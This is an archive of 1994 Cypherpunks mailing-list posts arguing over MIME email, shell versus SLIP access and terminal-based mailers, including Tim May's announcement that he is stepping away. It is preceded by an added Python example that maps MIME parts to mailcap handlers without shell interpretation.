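[Added example, not part of any poster's message.] The mailcap callout that Jim McCoy and Jonathan Rochkind describe above, sketched in Python: a mailer walks the MIME parts, looks up each content type in mailcap-style entries, and builds the handler's argument list without passing the file name through a shell. The command name `pgp-verify-wrapper`, the `/tmp/mime` path and the sample message are constructed for illustration, and the multipart/signed layout follows the form later standardised in RFC 1847 rather than anything quoted in the thread.

```python
"""Resolve mailcap-style handlers for the parts of a MIME message (added example)."""
import shlex
from email import message_from_string

# Constructed mailcap text. "pgp-verify-wrapper" is a hypothetical command name.
MAILCAP = """\
# content-type; command  (%s = file holding the decoded part)
text/plain; cat %s
application/pgp-signature; pgp-verify-wrapper %s
image/*; xv %s
"""

# Constructed sample message; the signature part is a placeholder, not PGP output.
SAMPLE = """\
From: alice@example.org
To: list@example.org
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: multipart/signed; boundary="inner";
 protocol="application/pgp-signature"

--inner
Content-Type: text/plain; charset=us-ascii

Signed body text.
--inner
Content-Type: application/pgp-signature

(placeholder where the detached signature would go)
--inner--

--outer
Content-Type: text/enriched

<bold>No handler is configured for this type.</bold>
--outer
Content-Type: image/gif
Content-Transfer-Encoding: base64

R0lGODlhAQABAAAAACw=
--outer--
"""


def parse_mailcap(text):
    """Return (type_pattern, command_template) pairs in file order.

    Simplified: ignores optional flags after the command and escaped ';'.
    """
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = [f.strip() for f in line.split(";")]
        if len(fields) < 2 or "/" not in fields[0]:
            continue  # malformed entry: skip it rather than guess
        entries.append((fields[0].lower(), fields[1]))
    return entries


def lookup(entries, content_type):
    """First entry that matches exactly or as 'major/*' wins."""
    major = content_type.split("/", 1)[0]
    for pattern, command in entries:
        if pattern in (content_type, major + "/*"):
            return command
    return None


def build_argv(template, path):
    """Expand %s into an argv list; the path stays one argument, so shell
    metacharacters in a file name are never interpreted."""
    return [tok.replace("%s", path) for tok in shlex.split(template)]


def plan(raw, entries, tmpdir="/tmp/mime"):
    """List (content_type, argv or None) per leaf part. Nothing is written
    or executed; tmpdir only names where a mailer would store each part."""
    steps = []
    for index, part in enumerate(message_from_string(raw).walk()):
        if part.is_multipart():
            continue  # containers carry structure, not displayable data
        ctype = part.get_content_type()
        command = lookup(entries, ctype)
        argv = build_argv(command, f"{tmpdir}/part{index}") if command else None
        steps.append((ctype, argv))
    return steps


if __name__ == "__main__":
    for ctype, argv in plan(SAMPLE, parse_mailcap(MAILCAP)):
        print(f"{ctype:28} -> {argv if argv else 'no handler: show as text or save'}")
```

A real verifier for multipart/signed needs the exact bytes of the first part together with the signature part; the per-part lookup here only shows where the mailer hands off to the external engine.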
From shamrock at netcom.com Thu Dec 15 22:08:50 1994 From: shamrock at netcom.com (Lucky Green) Date: Thu, 15 Dec 94 22:08:50 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: Tim wrote: >It may be backward, but it is how a huge fraction of the list accesses >the Net. Am I wrong on this? Dial-up access to local POPs is a fact of >life for many, many people. Do a "who cypherpunks" on the list and >look at the sites. Many will be dial-ups, others will be access to >university machines, via dial-ups, etc. Others will be a mix of >corporate machines, some with better connectivity than others, and >many with proprietary e-mail systems, such as VAXMail and the like. My >guess is that fewer than 20% of the list are directly SLIP- or >PPP-connected, with good access to the tools praised here by Amanda, >Perry, you, and others. I have the same type of shell account with Netcom that you have. However, thanks to The Internet Adapter I turned that shell account into a SLIP connection. If you have a shell account, you can convert it into a SLIP account. It is as simple as that. Not that it mattered much for MIME email. Eudora can handle that via dial-up just as well. Sure helps for browsers, though. Accessing the web through Lynx is a joke. Even if you have image loading turned off in the browser to conserve bandwidth, _anything_ is better than Lynx. >It might be a good idea to get some real statistics on this. We did >this a couple of years ago, and there was talk about doing it again. > >For reasons I just addressed in another post, I foresee being on a >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively >few complaints about it. My service provider keeps the 9446 current >newsgroups, provides ftp and suchlike tools, and I don't have to be a >sysadmin. Frankly, if I have to choose between not being able to see >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll >skip the GIFs. 
Perhaps we can find some common ground here. You don't want to have to use UNIX. You like your Mac, don't you? So why interact with a lousy terminal server if you can do all the things you can do there - and more - the Mac way? Think about it. All the benefits of a Mac interface without giving up the benefits you get from Netcom. (No, I don't work for TIA. I am just a VERY satisfied customer.) >Even Perry admits to using emacs, and Unix mailers like elm are not >exactly oxen. (I have a choice of several mailers, the usual ones. Big >deal.) I also have commercial Eudora, the PowerMac version no less, so >my offline mailer is adequate. This still doesn't mean non-ASCII >(graphics, fancy fonts, equations) can be plausible placed in >messages--and communicated to the list for reading/viewing. Any of the mailers that you can use on a shell are oxen. Anything that can be used over a VT100 emulator is an oxen. (At least where non-ASCII display data is concerned). >I'd like to see some evidence that I am one of the last of my tribe. > >Call me Ishi. You are fighting a lost cause and you know it. VT100 is dead. No, you are not the last of your tribe. I should hope that you have the good sense to come around before that happens. All your friends here sure hope for it. -- Lucky Green PGP encrypted mail preferred. From foodie at netcom.com Thu Dec 15 22:09:59 1994 From: foodie at netcom.com (Bryna And Jamie) Date: Thu, 15 Dec 94 22:09:59 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: At 9:24 PM 12/15/94, Alex Strasheim wrote: >As influential as Tim is, it doesn't matter whether he embraces MIME or >not. If he converted tonight, there'd still be millions of people who >feel the way he felt this morning. Getting Tim to capitulate isn't going >to solve the problem. Thank you, Alex. Can we give this one up yet? Pretty please? In any case, this is making the very recent "Can't we all get along?" 
posts amusing (*please*, don't nobody think that's a flame). -j -- On the internet, nobody knows you're a deity. __________________________________________________________ foodie at netcom.com From mccoy at io.com Thu Dec 15 22:24:19 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 22:24:19 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: Message-ID: <199412160624.AAA10990@pentagon.io.com> > From: foodie at netcom.com (Bryna And Jamie) [...] > Can we give this one up yet? Pretty please? Definitely. It was a strange sort of ego trip to have 10 messages an hour proclaiming "McCoy is Right!" in the subject line, but it is beginning to get a little too wierd for my tastes... :) jim From unicorn at access.digex.net Thu Dec 15 22:41:11 1994 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 15 Dec 94 22:41:11 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: On Thu, 15 Dec 1994, Lucky Green wrote: > Tim wrote: > > >It may be backward, but it is how a huge fraction of the list accesses > >the Net. Am I wrong on this? Dial-up access to local POPs is a fact of > >life for many, many people. [...] > >guess is that fewer than 20% of the list are directly SLIP- or > >PPP-connected, with good access to the tools praised here by Amanda, > >Perry, you, and others. > > I have the same type of shell account with Netcom that you have. However, > thanks to The Internet Adapter I turned that shell account into a SLIP > connection. If you have a shell account, you can convert it into a SLIP > account. It is as simple as that. Not that it mattered much for MIME email. > Eudora can handle that via dial-up just as well. Sure helps for browsers, > though. Accessing the web through Lynx is a joke. Even if you have image > loading turned off in the browser to conserve bandwidth, _anything_ is > better than Lynx. So, I'm running a Mac //cx with a shell account at the moment. 
I have a lowly 14.4k connection. What solution do you have for the user who has no direct connection to the net, has merely a modem speed bandwidth, and is in a non-isdn area? I often need to pull large files over 3 megs into my shell account at high speeds. (60-100 kb/sec) Impossible with SLIP. Are you telling me that I can do this and still have the advantage of SLIP? Forgive my ignorance, but you'll have to enlighten me. > > > >For reasons I just addressed in another post, I foresee being on a > >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively > >few complaints about it. My service provider keeps the 9446 current > >newsgroups, provides ftp and suchlike tools, and I don't have to be a > >sysadmin. Frankly, if I have to choose between not being able to see > >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll > >skip the GIFs. Same balance for me when it comes to the transfer rate. > > Perhaps we can find some common ground here. You don't want to have to use > UNIX. You like your Mac, don't you? So why interact with a lousy terminal > server if you can do all the things you can do there - and more - the Mac > way? Think about it. All the benefits of a Mac interface without giving up > the benefits you get from Netcom. (No, I don't work for TIA. I am just a > VERY satisfied customer.) > So how much am I expected to "shell out" ? > > >I'd like to see some evidence that I am one of the last of my tribe. > > > >Call me Ishi. > Sorry Tim, I'm with you. You're not alone yet. > You are fighting a lost cause and you know it. VT100 is dead. No, you are > not the last of your tribe. I should hope that you have the good sense to > come around before that happens. All your friends here sure hope for it. > I'll come around when I'm sure I'm not losing anything. Convince me. > > -- Lucky Green > PGP encrypted mail preferred. 
> 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From anonymous-remailer at shell.portal.com Thu Dec 15 22:46:04 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 22:46:04 PST Subject: MIME Message-ID: <199412160645.WAA10144@jobe.shell.portal.com> Fellow Mime-punks, Perry said: > Naturally the idea is old -- I explicitly mentioned NeXT mail, > didn't I? The point is that this is an open, non-proprietary, and > STANDARDIZED framework for doing arbitrary recursive encapsulation of > data in EMail. Well, if "open, non-proprietary, and STANDARDIZED frameworks" are always going to lag behind by several years, then I say the general population will be better off by having entities such as Microsoft or ETH decree their own "standards" and let the market decide to follow them, or be niche players and imitate them. Maybe I have yet to see the value of MIME, especially on mailing lists such as this one. So far I've just seen hundreds of messages about how cool it will be, one MIME encapsulated gif signature, one screwed up MIME post, several "faux MIME" ascii messages (definitely no multimedia extensions, just ascii). Lots of exhortation on how it would be in my best interest to spend hours to upgrade to MIME compatible readers so I can read the same mail I get now, plus the 0.01% MIME messages that drift through (none of which exhibit the superior features MIME allows). I think the point Tim is making is that at the current time, our lives are not made easier or enriched by "MIME". If I want point and click spreadsheet opening, I can use other systems that have worked for 5 years or more, with apps that are already configured and easier to use. From lmccarth at ducie.cs.umass.edu Thu Dec 15 22:51:08 1994 From: lmccarth at ducie.cs.umass.edu (L. 
McCarthy) Date: Thu, 15 Dec 94 22:51:08 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) Message-ID: <199412160656.BAA12137@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Jim "you don't have a fucking clue" McCoy writes: > Definitely. It was a strange sort of ego trip to have 10 messages an hour > proclaiming "McCoy is Right!" in the subject line, but it is beginning to > get a little too wierd for my tastes... :) How very convenient for you to say that now, several dozen messages after I observed that the list really _didn't_ need to revive this dumb flamewar. Thanks so much. Yours in disgust, L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE4sGf7YYibNzjpAQHuMwP+JA6Ec1zIzKrFV7xO0NEnq99hZWDYACQZ fWVXf4d6LqZWjv6sjpXdc3vjCz9PxdyRe50lhkYNWlfB+Yjx/+Ny92A6tk6XagoI 0Gr7BinZSZkMrX1I2GrwEwFbAFt4fSt5p/KbCmepP2IJF79+pU5IHxfyS1/mIwgA w7y3zuiPL7I= =0INf - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE58ioZzwIn1bdtAQErhgF7BcNdKtCUAjN7PpE5v3pff2dndv6BND44 yEG+NKZVbhF9GccWLU7E2wTU0ThuGT04 =zJ4m -----END PGP SIGNATURE----- From tcmay at netcom.com Thu Dec 15 22:56:36 1994 From: tcmay at netcom.com (Timothy C. May) Date: Thu, 15 Dec 94 22:56:36 PST Subject: Tim May the Luddite--His Last Message for A While In-Reply-To: <199412160506.XAA25917@pentagon.io.com> Message-ID: <199412160654.WAA02983@netcom15.netcom.com> It may be time for me to move on. More than 2 years on this list, since the B.C. period, may be too long. I'm fed up with fighting these battles, and no doubt many of you are fed up with seeing contentious pitched battles. 
Cypherpunks is increasingly a forum of strutting and posturing about who has the most powerful tools, who is spending more of their lives staying at the bleeding edge of technology. Depressing. The consensus of the active posters in this latest thread (Perry, Amanda, Lucky, Jim, others) is that I am a hopeless fuddy-duddy, unwilling to begin posting in the latest modality. (Funny, Netnews is still 99.999983% plain ASCII, by message count, and nobody advocating a more advanced scheme is actually _using_ such ne plus ultra formats here on this list. If it's so easy, and so 'punkly correct, why not?) Jim McCoy wrote: > If you are truly interested in making strong encryption easy and > transparent to the vast majority of the users of future communications > systems you should be leading the MIME charge, not holding everyone back... I don't care for this imputation that my views on communicating with the list are somehow holding others back. Or that discussing these issues is inconsistent with being "truly interested in making strong encryption easy and transparent." Bluntly, I'm fucking sick and tired of these cheap shots and personal innuendos. Maybe it's the "young guns" syndrome, with a codger like me whose first Net account was in 1972 being a ripe target for the newest pistoleros with their .486-caliber Linux boxes in their holsters. Whatever, I'm fed up. I'm taking a break and unsubbing for a while. If I'm back in time for the January meeting, we'll have the "Demo Day" as planned. If not, you'll have to play it by ear. As they say, you know what a Cypherpunks firing squad is? A circle. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. 
Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From lmccarth at ducie.cs.umass.edu Thu Dec 15 22:57:28 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 22:57:28 PST Subject: "Any of the mailers that you can use on a shell are oxen" Message-ID: <199412160702.CAA12222@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- Lucky Green writes: > Any of the mailers that you can use on a shell are oxen. So after my dept. tosses all its DECstations in the dumpster tomorrow, following your advice, what OS should the new machines support ? System 7 ? AmigaDOS ? VMS ? Windows 95 ? What's the fabulous alternative to Unix about which I've inexplicably missed hearing ? - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE6S2f7YYibNzjpAQGt3AQAoMajNodKjF20aCsXqXfrqmeVML6RH6nG PbN/wAF5u9zlqfwbsjg74PaWoh5PqyWIH5cQXfaiqRJNkGww0Z2hkKgJNHg+zyCH qJZY8d0iJflEo7CTqxoI7uEKseGrnzIJ0nb38R/rd3CtLzb5rw8ltJ6NPaflYYO+ 3ea/xwQgGmE= =Nlqf - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE7cioZzwIn1bdtAQEK3AGAjMhfsbT/32Ejb+NVC29w92OaGiHjKzez fqsKNblAcUlyESHgJ1X0xDCeglpbo6JP =ObL3 -----END PGP SIGNATURE----- From anonymous-remailer at replay.com Thu Dec 15 23:03:34 1994 From: anonymous-remailer at replay.com (Name withheld on request) Date: Thu, 15 Dec 94 23:03:34 PST Subject: mime ad naseum Message-ID: <199412160705.AA04013@xs1.xs4all.nl> Many people don't have mime mailers, and if you want to talk to them, you can't use mime features. 
You can tell them that they're stupid not to have better software or accounts, but until getting PPP running is as easy as installing the aol client, you'll just be pissing in the wind. You don't know it but you are. Is this list supposed to convey ideas or demonstrate the latest email standards? I'm not sure the two goals are compatible. From mccoy at io.com Thu Dec 15 23:09:15 1994 From: mccoy at io.com (Jim McCoy) Date: Thu, 15 Dec 94 23:09:15 PST Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!) In-Reply-To: <199412160656.BAA12137@bb.hks.net> Message-ID: <199412160709.BAA20011@pentagon.io.com> "L. McCarthy" writes: > > Jim "you don't have a fucking clue" McCoy writes: A position to which I still agree on this particular issue. Perhaps not stated as diplomatically as Perry did, but so be it... > > [lets drop the MIME discussion...] > > How very convenient for you to say that now, several dozen messages after I > observed that the list really _didn't_ need to revive this dumb flamewar. Actually this "dump flamewar" has produced some good discussion regarding actual implementation issues. Everything that has happened with MIME will happen again when people try to add cryptography to the structure of the net. Maybe there are some lessons to be learned here. ObCrypto: Does anyone know if a ref implementation of the Eastlake and Kaufman DNS extensions exists? Before I dig into BIND I am hoping that there might be code out there already.... jim From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:12:17 1994 From: lmccarth at ducie.cs.umass.edu (L. McCarthy) Date: Thu, 15 Dec 94 23:12:17 PST Subject: MIME acceptance test--where's the break-even point? Message-ID: <199412160717.CAA12325@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- - -----BEGIN PGP SIGNED MESSAGE----- If you can't beat `em, join `em -- hence I wade into the fray.... Amanda Walker writes: >To: cypherpunks at toad.com >Subject: MIME acceptance test--where's the break-even point? 
>Content-Disposition: Inline > > >This message contains 'text/enriched'-format data. >Do you want to view it using the 'cat' command (y/n) [y] ? Yeah, I'm sure that'll help a lot.... [...] > This message, for example, is formatted as text/enriched fixed> instead of text/plain. It's still readable on > 80-column ASCII terminals. It's got some extra > stuff, but so does every PGP-signed message, or > worse yet a PEM-signed message, and I would argue > that the MIME formatting itself is no more > objectionable than these, just as I would argue that base64 fixed> encoding (the format that graphics generally appear in when > MIME encapsulated) BTW, is that what that piece of obscura from Peter Cassidy the other day was supposed to be ? > is no more objectionable than > other mechanisms that serve the same purpose, such as PGP smaller> "ASCII armor", uuencoding, etc. [...] > Do you find this message to be "out of bounds" the way you found > my (intentionally excessive) GIF signature from a > while back to be? Yes and no. The .GIF you sent before caused my copy of elm to dump core, which was disconcerting but easy to remedy. I doubted that the picture you'd sent was worth viewing, so I didn't bother trying to view it with xv on my own. This message didn't prompt any error messages from elm, but it was a nightmare to read, thanks to the plethora of angle-bracketed font instructions embedded throughout the text. > If so, where's the boundary between this message and > the innumerable PGP formatted messages we see come by > on this list? The PGP-formatted messages don't cause my mailer to dump core, and don't have any embedded command sequences in their bodies, so I don't go cross-eyed trying to read them. That's a pretty clear line for me. YMMV. > How far are we willing to inconvenience the least common denominator > in order to provide the services we want (whether those services > be authentication & encryption, multimedia content, or anything > else)? 
Where to the cost and benefit curves cross? Actually, I wish you'd send a full test suite of MIME messages to the list, so I could compile a comprehensive list of the things I have to ask the tech support people here to fix. My copy of elm proclaims itself to be MIME-aware but hasn't done very well in practice. Another GIF enclosure would be handy, because I didn't keep the previous one. - - -L. Futplex McCarthy - -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQCVAwUBLvE9zGf7YYibNzjpAQHUHwP/UAyrTWjxiZDQBeSOL8cTCQ8xjM+lpsCN doALb8TtJCrypS0ihZzCZ6VpDi9E/JxKPF9lnLXqzCH0LVua3j0eiNXz7TCVfFP6 clziWY9RExiTRfREC8aphNw2XRVetjfhRIOsiBj7lSqNodKnN5GS2sUEDtIBNMdL EMfHAGIWTnU= =LxLk - -----END PGP SIGNATURE----- - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvE+8SoZzwIn1bdtAQErRQF+OLFnCDXeznWHQws8LkxatRgaf6+F1ZuK N5e9/i52pI1gNQ4MQL5kEyWzXdH0XmMM =LceU -----END PGP SIGNATURE----- From anonymous-remailer at shell.portal.com Thu Dec 15 23:14:17 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Thu, 15 Dec 94 23:14:17 PST Subject: Amanda and MIME Message-ID: <199412160714.XAA12540@jobe.shell.portal.com> Amanda wrote an interesting post. I think if we only use MIME, the quality of discussion on the list would skyrocket. Eric, you should block all non-MIME posts to the list. How could we have been so blind? I've come to rethink my position on MIME. It is definitely the savior. After all, this formatting just has some extra stuff which should be to hard to read around. Heck, I'm sure this is so legible to everybody I may launch into a mathematical explanation of various public key cryptography protocols. Maybe even a few dining cryptographers diagrams. 
I think the MIME backers should do something that makes me want MIME. Start posting such crucial diagrams and interesting formatted documents, so that I feel like I'm losing something by not going to MIME immediately. I haven't really seen how MIME will enrich the discussion (and I use that term loosely) here. Crap like including a gif/jpeg of myself with each post isn't exactly compelling.

From jamesd at netcom.com Thu Dec 15 23:14:40 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 15 Dec 94 23:14:40 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412152119.NAA07643@netcom2.netcom.com>
Message-ID:

Timothy C. May wrote:
> My main point is that the most compelling strategy seems to be to
> stick with ASCII for a while, avoid minor-but-painful gains with
> Postscript, Acrobat, Replica, TeX, FrameViewer, etc., and then jump to
> the Web/html/http/blah blah when the time is right.

I have noticed that folks with a Unix background have a rather higher tolerance for stuff that sort of works, most of the time, if you fiddle enough, than folks with Dos/Windows/Mac background

I suspect brain damage caused by a "make" utility that treats spaces as semantically different from tabs. AAargh! :-)

(But I am not an operating system bigot, I will freely admit that segments and REPE CMPS have led to disturbing mental symptoms amongst us PC folk.)

But seriously folks, GUI tools for manipulating and communicating information are just wonderfully superior. MIME etc provides a standard for such things. Problem is of course that it does not yet provide an entirely satisfactory reality. The standard is not yet standard.
Which is why you are probably reading this in a monospaced font with hard carriage returns, rather than the proportionally spaced font and soft line breaks that you get in the WWW

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com

From shamrock at netcom.com Thu Dec 15 23:25:36 1994
From: shamrock at netcom.com (Lucky Green)
Date: Thu, 15 Dec 94 23:25:36 PST
Subject: SLIP [Was: McCoy is Right! New Mail Format to Start Now.]
Message-ID:

Black Unicorn wrote:

>So, I'm running a Mac //cx with a shell account at the moment. I have a
>lowly 14.4k connection.

All I got is 9600.

>What solution do you have for the user who has no direct connection to
>the net, has merely a modem speed bandwidth, and is in a non-isdn area?
>
>I often need to pull large files over 3 megs into my shell account at
>high speeds. (60-100 kb/sec) Impossible with SLIP.

Well, perhaps I can interest you in QuickNet (16MEGAbps, that's an Ethernet, two video channels and several phonelines, all running over the very same 4 wires that are already in your wall) but in order for that to become available, you have to help convince Congress that local telco de-regulation is a Good Thing. Seriously, how do you get 100 kbps over a 14.4 kbps line? Even with the best compression you won't get that kind of throughput.

>Are you telling me that I can do this and still have the advantage of SLIP?

Whatever throughput rate you get from the shell, you can get via SLIP.

>Forgive my ignorance, but you'll have to enlighten me.

Gladly :-)

>> >
>> >For reasons I just addressed in another post, I foresee being on a
>> >dial-up (not a SLIP or PPP, that is) for a while. And I have relatively
>> >few complaints about it.
My service provider keeps the 9446 current
>> >newsgroups, provides ftp and suchlike tools, and I don't have to be a
>> >sysadmin. Frankly, if I have to choose between not being able to see
>> >someone's MIMEd GIF and becoming a Unix sysadmin for my own site, I'll
>> >skip the GIFs.
>
>Same balance for me when it comes to the transfer rate.

Let's assume for a moment that you get much faster throughput by zmodem'ing a file from the shell than by ftp'ing it via SLIP (some users have reported that zmodem from the shell is faster than ftp, but the difference is marginal at best. I have never been able to verify the claim.) Having tia on your shell account doesn't affect your ability to use the shell in any way. If you are so inclined, you can still download files from the shell as you did before. You can also turn the shell into a SLIP connection within seconds. Nothing lost, plenty gained.

[...]

>So how much am I expected to "shell out" ?

You don't have to shell out at all. If you ever need to use the shell (to change your .profile, .plan, password, etc) you can just telnet to your account. I usually just hang up and call via the terminal emulator the one time per month I do that, but there really is no need to do so.

>I'll come around when I'm sure I'm not losing anything.
>
>Convince me.

As for MIME, which started this thread, no SLIP is needed. There are several dial-up mailers that handle MIME just fine. As for SLIP, in many areas it has become as cheap as a shell account. In San Francisco, SLIP is cheaper than a shell account ($15/month flat rate). For those with an overpriced local SLIP provider, or those who also want a shell there is TIA.

Convinced?

-- Lucky Green
   PGP encrypted mail preferred.

From jamesd at netcom.com Thu Dec 15 23:25:39 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 15 Dec 94 23:25:39 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To: <199412160310.TAA23794@netcom10.netcom.com>
Message-ID:

On Thu, 15 Dec 1994, Timothy C. May wrote:

> -- Netcom doesn't give me a convenient way to bypass the dial-up
> terminal emulators (PPP and SLIP are no longer offered by Netcom)

Use TIA

> The comments here about Sun and Microsoft
> not properly--or at all--supporting MIME tell us that it's not real
> likely that most folks here will be sending spreadsheets out to the
> list readers and attaching GIFs anytime soon. No great loss, either.

Very true.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.

James A. Donald
jamesd at netcom.com

From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:37:47 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 15 Dec 94 23:37:47 PST
Subject: The Thread That Wouldn't Die (Was: Re: McCoy is Right!)
Message-ID: <199412160742.CAA12589@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

[Please don't cc: me on messages to the list. Thanks.]

Jim McCoy writes:
> Actually this "dump flamewar" has produced some good discussion regarding
> actual implementation issues.

I beg to differ. If you think that was a good discussion, I'd hate to see what you'd classify as a bad discussion. Crypto relevance was minimal, too.

> Everything that has happened with MIME will happen again when people try to
> add cryptography to the structure of the net.

It seems to me that people are *already* trying to add cryptography to the structure of the net, and that would actually be worth discussing.

> Maybe there are some lessons to be learned here.

_Maybe_, but I don't think anyone's learning them.

- - -L.
Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From jamesd at netcom.com Thu Dec 15 23:41:37 1994
From: jamesd at netcom.com (James A. Donald)
Date: Thu, 15 Dec 94 23:41:37 PST
Subject: McCoy is Right! New Mail Format to Start Now.
In-Reply-To:
Message-ID:

On Fri, 16 Dec 1994, Jonathan Rochkind wrote:

> MIME has nothing to do with annoying messages on your screen, and a
> reasonable mailer wouldn't give you those messages.

That will be a good argument when we have reasonable mailers.

It is not a good argument today.

You are using the wrong tense: You should not say "MIME is great". You should say "MIME *will be* great".

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.

James A. Donald
jamesd at netcom.com

From lmccarth at ducie.cs.umass.edu Thu Dec 15 23:46:34 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Thu, 15 Dec 94 23:46:34 PST
Subject: Remailers and Keyservers, active ones?
Message-ID: <199412160751.CAA12686@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Derek Atkins writes:
> The active remailers get periodically posted.
> I forget the site
> where you can request the current list.

http://www.cs.berkeley.edu/~raph/remailer-list.html is the best source I know.

For the WWW-deprived: finger remailer-list at kiwi.cs.berkeley.edu

I'm not aware of a way to obtain the list purely via email; maybe I should establish a way to do that if it's not out there....

- - -L. Futplex McCarthy

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

-----END PGP SIGNATURE-----

From blancw at pylon.com Thu Dec 15 23:52:41 1994
From: blancw at pylon.com (blancw at pylon.com)
Date: Thu, 15 Dec 94 23:52:41 PST
Subject: Tim May the Luddite--His Last Message for A While
Message-ID: <199412160753.XAA02891@deepthought.pylon.com>

Responding to msg by Timothy C. May:

Whatever, I'm fed up.
. . . .
As they say, you know what a Cypherpunks firing squad is?

A circle.
.............................................................

Cheap parting shot:

" The record shows I took the blows and did it MYYYYYYYYYYYYYY Waaaaaaaaaaaaay."

Blanc
(I just had to say that) :>)

From shamrock at netcom.com Fri Dec 16 00:14:54 1994
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 16 Dec 94 00:14:54 PST
Subject: "Any of the mailers that you can use on a shell are oxen"
Message-ID:

L. Futplex McCarthy wrote:

>Lucky Green writes:
>> Any of the mailers that you can use on a shell are oxen.
>
>So after my dept.
>tosses all its DECstations in the dumpster tomorrow,
>following your advice, what OS should the new machines support ? System 7 ?
>AmigaDOS ? VMS ? Windows 95 ? What's the fabulous alternative to Unix about
>which I've inexplicably missed hearing ?

I was afraid of this... I _love_ UNIX. I do not want to see it replaced. What I claim is that 7bit terminals and terminal emulators are a piece of history. My message is that the use of non-ASCII displayable data on the net is growing and that character based terminals are unable to handle the way information will (is) be(ing) presented. UNIX can handle graphics just fine, just VT100 can't. There can be no other lasting solution but to abandon VTwhatever in favor of bitmapped output devices.

Since running X over a dial-up connection is rather inefficient, and considering the significant computing power of the PC's that are now being underused as dumb terminals, processing the data locally seems to be a sensible solution.

-- Lucky Green
   PGP encrypted mail preferred.

From shamrock at netcom.com Fri Dec 16 00:15:40 1994
From: shamrock at netcom.com (Lucky Green)
Date: Fri, 16 Dec 94 00:15:40 PST
Subject: Tim May the Luddite--His Last Message for A While
Message-ID:

Tim wrote:

>It may be time for me to move on. More than 2 years on this list,
>since the B.C. period, may be too long.
>
>I'm fed up with fighting these battles, and no doubt many of you are
>fed up with seeing contentious pitched battles. Cypherpunks is
>increasingly a forum of strutting and posturing about who has the most
>powerful tools, who is spending more of their lives staying at the
